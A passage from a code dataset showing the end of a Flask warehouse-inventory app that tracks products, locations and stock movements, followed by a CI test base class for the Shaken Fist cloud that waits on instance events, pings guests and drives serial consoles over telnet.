request.method=='POST':\n\t\tif 'add_product_name' in request.form:\n\t\t\tproduct_name = request.form['add_product_name']\n\t\t\tif not product_name.strip():\n\t\t\t\tflash(f\"Product name is empty or contains only spaces!\", \"danger\")\n\t\t\t\treturn redirect('/product')\n\t\t\telif bool(Product.query.filter(func.lower(Product.name) == func.lower(product_name)).first()):\n\t\t\t\tflash(f\"'{product_name}' already exists!\", \"danger\")\n\t\t\t\treturn redirect('/product')\n\t\t\telse:\n\t\t\t\tnew_product=Product(name=product_name)\n\t\t\t\tdb.session.add(new_product)\n\t\t\t\tdb.session.commit()\n\t\t\t\tflash(f\"'{product_name}' is successfully added!\", \"success\")\n\t\t\t\treturn redirect('/product')\n\t\t\n\t\tif 'delete_product_id' in request.form:\n\t\t\tproduct_id = request.form['delete_product_id']\n\t\t\tproduct_name = ProductMovement.query.filter(ProductMovement.product_id==product_id,ProductMovement.Flag =='A').first() \n\t\t\tif product_name is not None:\n\t\t\t\tflash(f\"'Product used in movement cannot be deleted!\", \"danger\")\n\t\t\t\treturn redirect('/product')\n\t\t\telse:\n\t\t\t\tdelete_product = Product.query.get_or_404(product_id)\n\t\t\t\tdb.session.delete(delete_product)\n\t\t\t\tdb.session.commit()\n\t\t\t\tflash(f\"'{delete_product.name}' is successfully deleted!\", \"danger\")\n\t\t\t\treturn redirect('/product')\n\n\n\t\tif 'editproduct' in request.form:\n\t\t\tupdate_product_name = request.form['product_name']\n\t\t\tif bool(Product.query.filter(func.lower(Product.name) == func.lower(update_product_name)).first()):\n\t\t\t\tflash(f\"'{update_product_name}' already exists!\", \"danger\")\n\t\t\t\treturn redirect('/product')\n\t\t\telse:\n\t\t\t\tupdate_product_id = request.form['editproduct']\n\t\t\t\tupdate = Product.query.get_or_404(update_product_id)\n\t\t\t\te_id=ProductMovement.query.filter_by(product_id=update_product_id)\n\t\t\t\tfor i in e_id:\n\t\t\t\t\tedit_movement = ProductMovement.query.get_or_404(i.id)\n\t\t\t\t\tedit_movement.product_name=update_product_name\n\t\t\t\tupdate.name = update_product_name\n\t\t\t\tupdate.date_updated = datetime.utcnow()\n\t\t\t\tdb.session.commit()\n\t\t\t\tflash(f\" Product successfully updated!\", \"info\")\n\t\t\t\treturn redirect('/product')\n\telse:\n\t\tall_product = Product.query.order_by(Product.id).all()\n\t\tmessage = None\n\t\tproduct_details = get_data(\"product\")\n\t\tif not product_details:\n\t\t\tmessage = \"Currently Data is unavailable.Add Now!\"\n\t\t\n\t\treturn render_template('product.html',product_details=product_details,message=message)\n\n@app.route('/location',methods=['GET','POST'])\ndef locations():\n\tif request.method=='POST':\n\t\tif 'add_location_name' in request.form:\n\t\t\tlocation_name = request.form['add_location_name']\n\t\t\tif not location_name.strip():\n\t\t\t\tflash(f\"warehouse is empty or contains only spaces!\", \"danger\")\n\t\t\t\treturn redirect('/location')\n\t\t\telif bool(Location.query.filter(func.lower(Location.name) == func.lower(location_name)).first()):\n\t\t\t\tflash(f\"'{location_name}' warehouse already exists in the data!\", \"danger\")\n\t\t\t\treturn redirect('/location')\n\t\t\telse:\n\t\t\t\tnew_location=Location(name=location_name)\n\t\t\t\tdb.session.add(new_location)\n\t\t\t\tdb.session.commit()\n\t\t\t\tflash(f\"'{location_name}' warehouse is successfully added!\", \"success\")\n\t\t\t\treturn redirect('/location')\n\n\t\tif 'delete_location_id' in request.form:\n\t\t\tlocation_id = request.form['delete_location_id']\n\t\t\told_location_name = 
Location.query.filter_by(id=location_id).first() \n\t\t\tf_id=ProductMovement.query.filter(or_(ProductMovement.from_location == old_location_name.name,ProductMovement.to_location == old_location_name.name),ProductMovement.Flag =='A').first()\n\t\t\tif f_id is not None:\n\t\t\t\tflash(f\" Location used in movement cannot be deleted !\", \"danger\")\n\t\t\t\treturn redirect('/location')\n\t\t\telse:\n\t\t\t\tdelete_location = Location.query.get_or_404(location_id)\n\t\t\t\tdb.session.delete(delete_location)\n\t\t\t\tdb.session.commit()\n\t\t\t\tflash(f\"'{delete_location.name}' warehouse successfully deleted\", \"danger\")\n\t\t\t\treturn redirect('/location')\n\n\t\tif 'editlocation' in request.form:\n\t\t\tupdate_location_name = request.form['location_name']\n\t\t\tif bool(Location.query.filter(func.lower(Location.name) == func.lower(update_location_name)).first()):\n\t\t\t\tflash(f\"'{update_location_name}' warehouse already exists in the data!\", \"danger\")\n\t\t\t\treturn redirect('/location')\n\t\t\telse:\n\t\t\t\tupdate_location_id = request.form['editlocation']\n\t\t\t\told_location_name = Location.query.filter_by(id=update_location_id).first() \n\t\t\t\tupdate = Location.query.get_or_404(update_location_id)\n\t\t\t\tf_id=ProductMovement.query.filter_by(from_location = old_location_name.name)\n\t\t\t\tfor i in f_id:\n\t\t\t\t\tedit_movement = ProductMovement.query.get_or_404(i.id)\n\t\t\t\t\tedit_movement.from_location=update_location_name\n\t\t\t\tt_id=ProductMovement.query.filter_by(to_location=old_location_name.name)\n\t\t\t\tfor i in t_id:\n\t\t\t\t\tedit_movement = ProductMovement.query.get_or_404(i.id)\n\t\t\t\t\tedit_movement.to_location=update_location_name\n\t\t\t\tupdate.name = update_location_name\n\t\t\t\tupdate.date_updated = datetime.utcnow()\n\t\t\t\tdb.session.commit()\n\t\t\t\tflash(f\" Warehouse successfully updated to '{update.name}'!\", \"info\")\n\t\t\t\treturn redirect('/location')\n\telse:\n\t\tall_location = Location.query.order_by(Location.id).all()\n\t\tlocation_details = get_data(\"location\")\n\t\tmessage=None\n\t\tif not location_details:\n\t\t\tmessage = \"Currently Data is unavailable. 
\n\n@app.route('/movement', methods=['GET','POST'])\ndef movement():\n\tif request.method == 'POST':\n\t\tif 'add_product_qty' in request.form:\n\t\t\tproduct_name = request.form['product_name']\n\t\t\tfrom_location = request.form['from_location']\n\t\t\tto_location = request.form['to_location']\n\t\t\tproduct_qty = request.form['add_product_qty']\n\t\t\tif product_name == 'Select product':\n\t\t\t\tflash(\"Please select a product to add a movement!\", \"danger\")\n\t\t\t\treturn redirect('/movement')\n\t\t\telif int(product_qty) <= 0:\n\t\t\t\tflash(\"Please enter a quantity greater than zero!\", \"danger\")\n\t\t\t\treturn redirect('/movement')\n\t\t\telif from_location == to_location:\n\t\t\t\tflash(\"From Location and To Location cannot be the same!\", \"danger\")\n\t\t\t\treturn redirect('/movement')\n\t\t\telse:\n\t\t\t\tproduct_details = Product.query.filter_by(name=product_name).first()\n\t\t\t\tadd_movement = ProductMovement()\n\t\t\t\tadd_movement.product_id = product_details.id\n\t\t\t\tadd_movement.product_name = product_details.name\n\n\t\t\t\t# Count active movements that have ever delivered this product\n\t\t\t\t# to the chosen source warehouse.\n\t\t\t\tcheck_location = ProductMovement.query.filter_by(product_name=product_name).filter_by(to_location=from_location,Flag='A').count()\n\t\t\t\tif from_location == 'Select Location':\n\t\t\t\t\tadd_movement.from_location = \"---\"\n\t\t\t\t\tadd_movement.to_location = to_location\n\t\t\t\telif to_location == 'Select Location':\n\t\t\t\t\tadd_movement.to_location = \"---\"\n\t\t\t\t\tadd_movement.from_location = from_location\n\t\t\t\telif check_location == 0 and from_location != 'Select Location':\n\t\t\t\t\tflash(f\"Product not available at '{from_location}' Warehouse!\", \"danger\")\n\t\t\t\t\treturn redirect('/movement')\n\t\t\t\telse:\n\t\t\t\t\tadd_movement.from_location = from_location\n\t\t\t\t\tadd_movement.to_location = to_location\n\n\t\t\t\tsum_qty = get_total(product_name,from_location)\n\n\t\t\t\tif int(product_qty) > sum_qty and from_location != 'Select Location':\n\t\t\t\t\tflash(f\"Only {sum_qty} quantity is available at '{from_location}' Warehouse!\", \"danger\")\n\t\t\t\t\treturn redirect('/movement')\n\t\t\t\telse:\n\t\t\t\t\tadd_movement.product_qty = product_qty\n\t\t\t\tadd_movement.Flag = 'A'\n\t\t\t\tdb.session.add(add_movement)\n\t\t\t\tdb.session.commit()\n\t\t\t\tflash(f\"'{add_movement.product_name}' movement successfully added!\", \"success\")\n\t\t\t\treturn redirect('/movement')\n\n\t\tif 'delete_movement_id' in request.form:\n\t\t\tmovement_id = request.form['delete_movement_id']\n\t\t\tproduct_name = request.form['delete_product_name']\n\t\t\tto_location = request.form['delete_to_location']\n\t\t\t# A movement can only be removed if no later movement exports the\n\t\t\t# stock it delivered.\n\t\t\tfcheck_qty = get_export_data(product_name,to_location,movement_id,\"future\")\n\t\t\tfcheck_qty = fcheck_qty.first()\n\t\t\tif fcheck_qty is None:\n\t\t\t\tdelete_movement = ProductMovement.query.get_or_404(movement_id)\n\t\t\t\tdelete_movement.Flag = 'I'\n\t\t\t\tdb.session.commit()\n\t\t\t\tflash(f\"{product_name} movement successfully deleted\", \"danger\")\n\t\t\t\treturn redirect('/movement')\n\t\t\telse:\n\t\t\t\tflash(f\"Please delete the {fcheck_qty.from_location} to {fcheck_qty.to_location} movement before this one!\", \"danger\")\n\t\t\t\treturn redirect('/movement')
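\n\n\t\t# The edit branch below re-validates the quantity against two windows\n\t\t# computed by get_total(): 'past' (movements with a smaller id) bounds\n\t\t# how much stock was available at the source when this movement ran,\n\t\t# and 'future' (movements with a larger id) bounds how much later\n\t\t# movements have already consumed, so an edit cannot retroactively\n\t\t# starve a later movement.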
\n\t\tif 'edit_movement' in request.form:\n\t\t\tvalid = True\n\t\t\tmovement_id = request.form['edit_movement']\n\t\t\tproduct_name = request.form['product_name']\n\t\t\tfrom_location = request.form['from_location']\n\t\t\tto_location = request.form['to_location']\n\t\t\tproduct_qty = request.form['product_qty']\n\t\t\tproduct_details = Product.query.filter_by(name=product_name).first()\n\t\t\tedit_movement = ProductMovement.query.get_or_404(movement_id)\n\n\t\t\tif from_location == \"---\":\n\t\t\t\tpast_sum_qty = get_total(product_name,to_location,movement_id,\"past\")\n\t\t\telse:\n\t\t\t\tpast_sum_qty = get_total(product_name,from_location,movement_id,\"past\")\n\n\t\t\tif to_location == \"---\":\n\t\t\t\tfuture_sum_qty = get_total(product_name,from_location,movement_id,\"future\")\n\t\t\telse:\n\t\t\t\tfuture_sum_qty = get_total(product_name,to_location,movement_id,\"future\")\n\n\t\t\tif from_location == to_location:  # source and destination cannot be the same\n\t\t\t\tvalid = False\n\t\t\t\tflash(\"From Location and To Location cannot be the same!\", \"danger\")\n\t\t\t\treturn redirect('/movement')\n\t\t\tif int(product_qty) <= 0:  # quantity must be positive\n\t\t\t\tvalid = False\n\t\t\t\tflash(\"Please enter a quantity greater than zero!\", \"danger\")\n\t\t\t\treturn redirect('/movement')\n\n\t\t\tif from_location == \"---\":  # minimum quantity is set by future movements\n\t\t\t\tif future_sum_qty != 0:\n\t\t\t\t\tif int(product_qty) >= int(future_sum_qty):\n\t\t\t\t\t\tvalid = True\n\t\t\t\t\telse:\n\t\t\t\t\t\tvalid = False\n\t\t\t\t\t\tflash(f\"Please add at least {future_sum_qty} quantity of {product_name} at '{to_location}' Warehouse!\", \"danger\")\n\t\t\t\t\t\treturn redirect('/movement')\n\n\t\t\tif future_sum_qty == 0:\n\t\t\t\tif int(product_qty) <= past_sum_qty:  # past stock covers the new quantity\n\t\t\t\t\tvalid = True\n\t\t\t\telif int(product_qty) > past_sum_qty and from_location != '---':  # requested quantity exceeds past stock\n\t\t\t\t\tflash(f\"Please enter a quantity of {past_sum_qty} or less for the '{from_location}' to {to_location} movement!\", \"danger\")\n\t\t\t\t\treturn redirect('/movement')\n\n\t\t\telif int(product_qty) <= past_sum_qty and int(product_qty) >= future_sum_qty:\n\t\t\t\tvalid = True\n\n\t\t\telif past_sum_qty <= int(product_qty) and from_location == \"---\" and int(product_qty) >= future_sum_qty:\n\t\t\t\tvalid = True\n\t\t\telse:\n\t\t\t\tif int(product_qty) > past_sum_qty and int(product_qty) < future_sum_qty:\n\t\t\t\t\tvalid = False\n\t\t\t\t\tflash(f\"Please enter a quantity of {past_sum_qty} or less for the '{from_location}' to {to_location} movement!\", \"danger\")\n\t\t\t\t\treturn redirect('/movement')\n\t\t\t\telif int(product_qty) < past_sum_qty and int(product_qty) < future_sum_qty:\n\t\t\t\t\tvalid = False\n\t\t\t\t\tflash(f\"Please add at least {future_sum_qty} quantity of {product_name} for the '{from_location}' to {to_location} movement!\", \"danger\")\n\t\t\t\t\treturn redirect('/movement')\n\t\t\t\telse:\n\t\t\t\t\tvalid = False\n\t\t\t\t\tif past_sum_qty > future_sum_qty:\n\t\t\t\t\t\tflash(f\"Please enter a quantity of {past_sum_qty} or less for the '{from_location}' to {to_location} movement!\", \"danger\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tflash(f\"Please enter a quantity between {past_sum_qty} and {future_sum_qty} for the '{from_location}' to {to_location} movement!\", \"danger\")\n\t\t\t\t\treturn redirect('/movement')\n\n\t\t\tif valid:
\n\t\t\t\tedit_movement.product_id = product_details.id\n\t\t\t\tedit_movement.product_name = product_details.name\n\t\t\t\tedit_movement.from_location = from_location\n\t\t\t\tedit_movement.to_location = to_location\n\t\t\t\tedit_movement.product_qty = product_qty\n\t\t\t\tedit_movement.date_updated = datetime.utcnow()\n\t\t\t\tdb.session.commit()\n\t\t\t\tflash(f\"'{edit_movement.product_name}' movement successfully edited!\", \"success\")\n\t\t\t\treturn redirect('/movement')\n\n\telse:\n\t\tall_product = Product.query.all()\n\t\tall_location = Location.query.all()\n\t\tall_movement = ProductMovement.query.filter_by(Flag=\"A\").order_by(ProductMovement.id).all()\n\t\tmessage = None\n\t\tif not all_movement:\n\t\t\tmessage = \"Currently data is unavailable. Add now!\"\n\t\treturn render_template('movement.html',products=all_product,locations=all_location,movements=all_movement,message=message)\n\n\ndef get_total(product, location, movement=None, process=None):\n\timported = 0\n\texported = 0\n\n\tif movement is None:\n\t\timported_items = get_import_data(product,location)\n\telse:\n\t\timported_items = get_import_data(product,location,movement,process)\n\tif imported_items:\n\t\tfor item in imported_items:\n\t\t\timported += item.product_qty\n\tif movement is None:\n\t\texported_items = get_export_data(product,location)\n\telse:\n\t\texported_items = get_export_data(product,location,movement,process)\n\tif exported_items:\n\t\tfor item in exported_items:\n\t\t\texported += item.product_qty\n\n\t# The available stock is reported as the absolute difference; for\n\t# consistent data, exports should never exceed imports.\n\tif exported > imported:\n\t\ttotal = exported - imported\n\telse:\n\t\ttotal = imported - exported\n\treturn total\n\n\ndef get_import_data(product, location, movement=None, process=None):\n\timported = []  # defensive default for an unknown process value\n\tif movement is not None:\n\t\tif process == 'past':\n\t\t\timported = ProductMovement.query.filter(ProductMovement.id < movement, ProductMovement.product_name == product, ProductMovement.to_location == location, ProductMovement.Flag == 'A')\n\t\telif process == 'future':\n\t\t\timported = ProductMovement.query.filter(ProductMovement.id > movement, ProductMovement.product_name == product, ProductMovement.to_location == location, ProductMovement.Flag == 'A')\n\telse:\n\t\timported = ProductMovement.query.filter_by(product_name=product).filter_by(to_location=location).filter_by(Flag='A').all()\n\n\treturn imported\n\n\ndef get_export_data(product, location, movement=None, process=None):\n\tif movement is not None:\n\t\tif process == 'past':\n\t\t\texported = ProductMovement.query.filter(ProductMovement.id < movement, ProductMovement.product_name == product, ProductMovement.from_location == location, ProductMovement.Flag == 'A')\n\t\t\treturn exported\n\t\tif process == 'future':\n\t\t\texported = ProductMovement.query.filter(ProductMovement.id > movement, ProductMovement.product_name == product, ProductMovement.from_location == location, ProductMovement.Flag == 'A')\n\t\t\treturn exported\n\t\treturn []  # defensive default for an unknown process value\n\telse:\n\t\texported = ProductMovement.query.filter_by(product_name=product).filter_by(from_location=location).filter_by(Flag='A').all()\n\t\treturn exported
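\n\n\n# A worked example of the helpers above, with hypothetical data: if product\n# 'Pen' has active movements id=1 ('---' -> 'A', qty 10) and id=3\n# ('A' -> 'B', qty 4), then get_total('Pen', 'A') is 10 - 4 = 6. Passing\n# movement=3 with process='past' restricts the queries to rows with id < 3,\n# so the past total at 'A' is 10; process='future' restricts them to rows\n# with id > 3.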
\ndef get_data(process=None):\n\tall_data = []\n\tproducts = Product.query.all()\n\tlocations = Location.query.all()\n\ttotal_qty = 0\n\n\tif process == \"product\":\n\t\tfor product in products:\n\t\t\tdata = {}\n\t\t\tprod_name = product.name\n\t\t\tprod_id = product.id\n\t\t\tdata['id'] = prod_id\n\t\t\tdata['name'] = prod_name\n\t\t\tfor location in locations:\n\t\t\t\tloc_name = location.name\n\t\t\t\ttotal = get_total(prod_name,loc_name)\n\t\t\t\tif total == 0:\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\ttotal_qty += total\n\t\t\tif total_qty == 0:\n\t\t\t\tdata['available_quantity'] = '---'\n\t\t\telse:\n\t\t\t\tdata['available_quantity'] = total_qty\n\t\t\ttotal_qty = 0\n\t\t\tall_data.append(data)\n\t\treturn all_data\n\n\telif process == \"location\":\n\t\tfor location in locations:\n\t\t\tdata = {}\n\t\t\tprod_data = []\n\t\t\tloc_name = location.name\n\t\t\tloc_id = location.id\n\t\t\tdata['id'] = loc_id\n\t\t\tdata['name'] = loc_name\n\t\t\tfor product in products:\n\t\t\t\tprod_name = product.name\n\t\t\t\ttotal = get_total(prod_name,loc_name)\n\t\t\t\tif total == 0:\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\tprod_data.append(prod_name)\n\t\t\tdata['prod_list'] = ', '.join(prod_data)\n\t\t\tall_data.append(data)\n\t\treturn all_data\n\telse:\n\t\tfor product in products:\n\t\t\tfor location in locations:\n\t\t\t\tdata = {}\n\t\t\t\tprod_name = product.name\n\t\t\t\tloc_name = location.name\n\t\t\t\ttotal = get_total(prod_name,loc_name)\n\t\t\t\tif total == 0:\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\tdata['product'] = prod_name\n\t\t\t\t\tdata['location'] = loc_name\n\t\t\t\t\tdata['available_quantity'] = total\n\t\t\t\tall_data.append(data)\n\t\treturn all_data\n\n\nif __name__ == '__main__':\n\tapp.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":19121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"147759451","text":"import datetime\nimport random\nfrom socket import error as socket_error\nimport string\nimport sys\nimport testtools\nimport telnetlib\nimport time\n\nfrom oslo_concurrency import processutils\nfrom prettytable import PrettyTable\nfrom shakenfist_client import apiclient\n\n\nclass TimeoutException(Exception):\n pass\n\n\nclass StartException(Exception):\n pass\n\n\nclass WrongEventException(Exception):\n pass\n\n\n# NOTE(mikal): this is a hack to \"turn up the knob\" on how slow image\n# downloads can be while my ISP is congested because of COVID. We should\n# turn this back down as things improve.\nNETWORK_PATIENCE_FACTOR = 3\n\n\nclass BaseTestCase(testtools.TestCase):\n def setUp(self):\n super(BaseTestCase, self).setUp()\n\n self.system_client = apiclient.Client(\n async_strategy=apiclient.ASYNC_PAUSE)\n\n def _make_namespace(self, name, key):\n self._remove_namespace(name)\n\n self.system_client.create_namespace(name)\n self.system_client.add_namespace_key(name, 'test', key)\n return apiclient.Client(\n base_url=self.system_client.base_url,\n namespace=name, key=key,\n async_strategy=apiclient.ASYNC_PAUSE)\n\n def _remove_namespace(self, name):\n ns = self.system_client.get_namespaces()\n if name in ns:\n self.system_client.delete_namespace(name)\n\n def _uniquifier(self):\n return ''.join(random.choice(string.ascii_lowercase) for i in range(8))
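\n\n # A sketch of how tests use the namespace helpers above (names here are\n # hypothetical): each test gets an isolated namespace plus a client\n # scoped to it, and _make_namespace removes any stale namespace first.\n #\n # client = self._make_namespace('ci-example', 'example-key')\n # client.get_instances()\n # self._remove_namespace('ci-example')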
\n\n def _log_console(self, instance_uuid):\n \"\"\"Log the console of the instance so that we can debug.\"\"\"\n sys.stderr.write(\n '----------------------- start %s console -----------------------\\n'\n % instance_uuid)\n for line in self.system_client.get_console_data(instance_uuid, -1).split('\\n'):\n sys.stderr.write('Instance console: %s\\n' % line)\n sys.stderr.write(\n '----------------------- end %s console -----------------------\\n'\n % instance_uuid)\n\n def _log_instance_events(self, instance_uuid):\n # If we've failed, log all events and then raise an exception\n self._log_events(instance_uuid,\n self.system_client.get_instance_events(instance_uuid))\n\n def _log_image_events(self, image_uuid):\n self._log_events(\n image_uuid, self.system_client.get_artifact_events(image_uuid))\n\n def _log_events(self, uuid, event_source):\n x = PrettyTable()\n x.field_names = ['timestamp', 'node',\n 'operation', 'phase', 'duration', 'message']\n for e in event_source:\n e['timestamp'] = datetime.datetime.fromtimestamp(e['timestamp'])\n x.add_row([e['timestamp'], e['fqdn'], e['operation'], e['phase'],\n e['duration'], e['message']])\n\n sys.stderr.write(\n '----------------------- start %s events -----------------------\\n'\n % uuid)\n sys.stderr.write(str(x))\n sys.stderr.write('\\n')\n sys.stderr.write(\n '----------------------- end %s events -----------------------\\n'\n % uuid)\n\n def _log_netns(self):\n \"\"\"Log the current net namespaces.\"\"\"\n sys.stderr.write(\n '----------------------- netns -----------------------\\n')\n out, _ = processutils.execute('sudo ip netns', shell=True,\n check_exit_code=[0, 1])\n # processutils.execute() returns stdout as a single string, so write\n # it out in one go rather than iterating over its characters.\n sys.stderr.write(out)\n sys.stderr.write(\n '----------------------- end netns -----------------------\\n')
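\n\n # Typical use of the _await_* helpers below (a sketch; instance_uuid is\n # assumed to reference an existing instance): wait for boot, keep the\n # returned event timestamp, then wait for an event strictly after it.\n #\n # booted = self._await_login_prompt(instance_uuid)\n # self._await_power_off(instance_uuid, after=booted)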
\n\n def _await_power_off(self, instance_uuid, after=None):\n return self._await_instance_event(\n instance_uuid, 'detected poweroff', after=after)\n\n def _await_login_prompt(self, instance_uuid, after=None):\n return self._await_instance_event(\n instance_uuid, 'trigger', 'login prompt', after)\n\n def _await_cloud_init_complete(self, instance_uuid, after=None):\n return self._await_instance_event(\n instance_uuid, 'trigger', 'cloud-init complete', after)\n\n def _await_instance_event(\n self, instance_uuid, operation, message=None, after=None):\n # Wait up to 5 minutes (times the patience factor) for the instance\n # to be created. On a slow morning it can take over 2 minutes to\n # download an Ubuntu image.\n start_time = time.time()\n final = False\n while time.time() - start_time < 5 * 60 * NETWORK_PATIENCE_FACTOR:\n i = self.system_client.get_instance(instance_uuid)\n if i['state'] in ['created', 'error']:\n final = True\n break\n time.sleep(5)\n\n if i['state'] == 'error':\n raise StartException(\n 'Instance %s failed to start (marked as error state, %s)'\n % (instance_uuid, i))\n\n if not final:\n raise TimeoutException(\n 'Instance %s was not created in a reasonable time (%s)'\n % (instance_uuid, i))\n\n # Once created, we shouldn't need more than another 2 minutes for boot.\n start_time = time.time()\n while time.time() - start_time < 2 * 60:\n for event in self.system_client.get_instance_events(instance_uuid):\n if after and event['timestamp'] <= after:\n continue\n\n if (event['operation'] == operation and\n (not message or event['message'] == message)):\n return event['timestamp']\n\n time.sleep(5)\n\n # If this is a login prompt, then try mashing the console keyboard\n if message == 'login prompt':\n try:\n s = telnetlib.Telnet(i['node'], i['console_port'], 30)\n s.write('\\n'.encode('ascii'))\n s.close()\n except socket_error:\n pass\n\n self._log_console(instance_uuid)\n self._log_instance_events(instance_uuid)\n raise TimeoutException(\n 'After time %s, instance %s had no event \"%s:%s\" (timed out)' % (\n after, instance_uuid, operation, message))\n\n def _await_image_download_success(self, image_uuid, after=None):\n return self._await_image_event(image_uuid, 'fetch', 'success', after)\n\n def _await_image_download_error(self, image_uuid, after=None):\n return self._await_image_event(\n image_uuid, 'fetch', 'DNS error', after)\n\n def _await_image_event(\n self, image_uuid, operation, message=None, after=None):\n start_time = time.time()\n while time.time() - start_time < 5 * 60 * NETWORK_PATIENCE_FACTOR:\n for event in self.system_client.get_artifact_events(image_uuid):\n if after and event['timestamp'] <= after:\n continue\n\n if event['operation'] == operation:\n if message in str(event['message']):\n return event['timestamp']\n\n self._log_image_events(image_uuid)\n raise WrongEventException(\n 'After time %s, image %s expected event \"%s:%s\" got %s'\n % (after, image_uuid, operation, message, event['message']))\n\n time.sleep(5)\n\n self._log_image_events(image_uuid)\n raise TimeoutException(\n 'After time %s, image %s had no event type \"%s\" (waited %s mins)'\n % (after, image_uuid, operation, 5 * NETWORK_PATIENCE_FACTOR))\n\n def _await_network_ready(self, network_uuid):\n start_time = time.time()\n while time.time() - start_time < 2 * 60:\n n = self.system_client.get_network(network_uuid)\n if n.get('state') == 'created':\n return\n time.sleep(5)\n\n raise TimeoutException(\n 'Network %s never became ready (waited 2 mins)' % network_uuid)
\n\n def _test_ping(self, instance_uuid, network_uuid, ip, expected, attempts=1):\n while attempts:\n sys.stderr.write(' _test_ping() attempts=%s\\n' % attempts)\n attempts -= 1\n output = self.system_client.ping(network_uuid, ip)\n\n actual = output.get('stdout').find(' 0% packet loss') != -1\n if actual == expected:\n break\n\n # Almost unnecessary due to the slowness of execute()\n time.sleep(1)\n\n if expected != actual:\n self._log_console(instance_uuid)\n self._log_instance_events(instance_uuid)\n self._log_netns()\n sys.stderr.write('Current time: ' + time.ctime() + '\\n')\n self.fail('Ping test failed. Expected %s != actual %s.\\nout: %s\\nerr: %s\\n'\n % (expected, actual, output['stdout'], output['stderr']))\n\n\nclass BaseNamespacedTestCase(BaseTestCase):\n def __init__(self, *args, **kwargs):\n namespace_prefix = kwargs.get('namespace_prefix')\n del kwargs['namespace_prefix']\n self.namespace = 'ci-%s-%s' % (namespace_prefix,\n self._uniquifier())\n self.namespace_key = self._uniquifier()\n\n super(BaseNamespacedTestCase, self).__init__(*args, **kwargs)\n\n def setUp(self):\n super(BaseNamespacedTestCase, self).setUp()\n self.test_client = self._make_namespace(\n self.namespace, self.namespace_key)\n\n def tearDown(self):\n super(BaseNamespacedTestCase, self).tearDown()\n\n non_blocking_client = apiclient.Client(\n base_url=self.system_client.base_url,\n namespace=self.namespace, key=self.namespace_key,\n async_strategy=apiclient.ASYNC_CONTINUE)\n for inst in non_blocking_client.get_instances():\n non_blocking_client.delete_instance(inst['uuid'])\n\n start_time = time.time()\n while time.time() - start_time < 5 * 60:\n if not list(non_blocking_client.get_instances()):\n break\n time.sleep(5)\n\n remaining_instances = list(non_blocking_client.get_instances())\n if remaining_instances:\n self.fail('Failed to delete instances: %s'\n % remaining_instances)\n\n for net in non_blocking_client.get_networks():\n non_blocking_client.delete_network(net['uuid'])\n\n start_time = time.time()\n while time.time() - start_time < 5 * 60:\n if not list(non_blocking_client.get_networks()):\n break\n time.sleep(5)\n\n remaining_networks = list(non_blocking_client.get_networks())\n if remaining_networks:\n self.fail('Failed to delete networks: %s'\n % remaining_networks)\n\n self._remove_namespace(self.namespace)\n\n\nclass TestDistroBoots(BaseNamespacedTestCase):\n def setUp(self):\n super(TestDistroBoots, self).setUp()\n self.net = self.test_client.allocate_network(\n '192.168.242.0/24', True, True, '%s-net' % self.namespace)\n self._await_network_ready(self.net['uuid'])\n\n def _test_distro_boot(self, base_image):\n inst = self.test_client.create_instance(\n base_image.replace(':', '-').replace('.', ''), 1, 1024,\n [\n {\n 'network_uuid': self.net['uuid']\n }\n ],\n [\n {\n 'size': 8,\n 'base': base_image,\n 'type': 'disk'\n }\n ], None, None)\n\n self._await_login_prompt(inst['uuid'])\n\n ip = self.test_client.get_instance_interfaces(inst['uuid'])[0]['ipv4']\n self._test_ping(inst['uuid'], self.net['uuid'], ip, True)\n\n self.test_client.delete_instance(inst['uuid'])\n inst_uuids = [i['uuid'] for i in self.test_client.get_instances()]\n self.assertNotIn(inst['uuid'], inst_uuids)
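\n\n# LoggingSocket below drives an instance's serial console over telnet. A\n# minimal usage sketch (the host and port here are hypothetical; the\n# credentials sent by ensure_fresh() are the cirros defaults):\n#\n# console = LoggingSocket('sf-node-1', 30001)\n# print(console.execute('ip addr'))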
\n\nclass LoggingSocket(object):\n ctrlc = '\\x03'\n\n def __init__(self, host, port):\n attempts = 5\n while attempts:\n try:\n attempts -= 1\n self.s = telnetlib.Telnet(host, port, 30)\n return\n\n except ConnectionRefusedError:\n print('!! Connection refused, retrying')\n time.sleep(5)\n\n raise ConnectionRefusedError(\n 'Repeated telnet connection attempts failed: host=%s port=%s' %\n (host, port))\n\n def ensure_fresh(self):\n # Interrupt anything running, log out, and log back in so that the\n # console is sitting at a fresh shell prompt.\n for d in [self.ctrlc, self.ctrlc, '\\nexit\\n', 'cirros\\n', 'gocubsgo\\n']:\n self.send(d)\n time.sleep(0.5)\n self.recv()\n\n def send(self, data):\n print('>> %s' % data.replace('\\n', '\\\\n').replace('\\r', '\\\\r'))\n self.s.write(data.encode('ascii'))\n\n def recv(self):\n data = self.s.read_eager().decode('ascii')\n for line in data.split('\\n'):\n print('<< %s' % line.replace('\\r', '\\\\r'))\n return data\n\n def execute(self, cmd):\n self.ensure_fresh()\n self.send(cmd + '\\n')\n time.sleep(5)\n d = ''\n\n # Keep reading until we see a shell prompt, but give up after ten\n # reads rather than hanging on a missing prompt.\n reads = 0\n while not d.endswith('\\n$ '):\n d += self.recv()\n reads += 1\n\n if reads > 10:\n break\n return d\n","sub_path":"deploy/shakenfist_ci/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":13287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}